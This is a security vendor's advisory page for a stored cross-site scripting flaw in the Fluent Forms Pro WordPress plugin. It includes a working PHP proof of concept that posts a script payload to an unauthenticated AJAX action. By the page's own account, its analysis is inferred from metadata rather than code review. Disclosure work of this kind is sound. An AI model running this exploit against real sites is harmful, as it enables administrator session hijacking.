Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-2365: Fluent Forms Pro <= 6.1.17 – Unauthenticated Stored Cross-Site Scripting via Draft Form Submission (fluentformpro)

CVE ID CVE-2026-2365
Plugin fluentformpro
Severity High (CVSS 7.2)
CWE 79
Vulnerable Version 6.1.17
Patched Version
Disclosed March 3, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2365 (metadata-based):
The vulnerability exists in the Fluent Forms Pro WordPress plugin. The root cause is an unauthenticated AJAX endpoint with insufficient input sanitization and output escaping. The `fluentform_step_form_save_data` AJAX action is publicly accessible without authentication or nonce verification. This allows unauthenticated attackers to submit draft form data containing malicious scripts. The plugin stores this data without proper sanitization. The stored scripts execute when an administrator views the partial form entry in the WordPress dashboard. The CVSS vector indicates network attack vector, low attack complexity, no privileges required, no user interaction, and scope change with low confidentiality and integrity impact. The fix likely requires adding authentication or capability checks to the AJAX handler, implementing nonce verification, and applying proper sanitization (e.g., `sanitize_text_field`) and output escaping (e.g., `esc_html` or `wp_kses`). The impact includes session hijacking, administrative account compromise, and site defacement via stored XSS payloads. These conclusions about the endpoint and missing security controls are inferred from the CWE and description, not confirmed via code review.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-2365 - Fluent Forms Pro <= 6.1.17 - Unauthenticated Stored Cross-Site Scripting via Draft Form Submission
<?php

$target_url = 'https://example.com';

// WordPress AJAX endpoint
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Payload to inject JavaScript that triggers on admin page view
$payload = '<script>alert(document.domain)</script>';

// Construct POST data for the vulnerable AJAX action
$post_data = [
    'action' => 'fluentform_step_form_save_data',
    'form_id' => '1', // Assumes at least one form exists
    'step_data' => json_encode([
        'fields' => [
            'input_field' => $payload
        ]
    ])
];

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Output results
if ($http_code === 200 && strpos($response, 'success') !== false) {
    echo "Payload injected successfully.n";
    echo "The script will execute when an administrator views the draft submission.n";
} else {
    echo "Injection failed. HTTP Code: $http_coden";
    echo "Response: $responsen";
}

?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School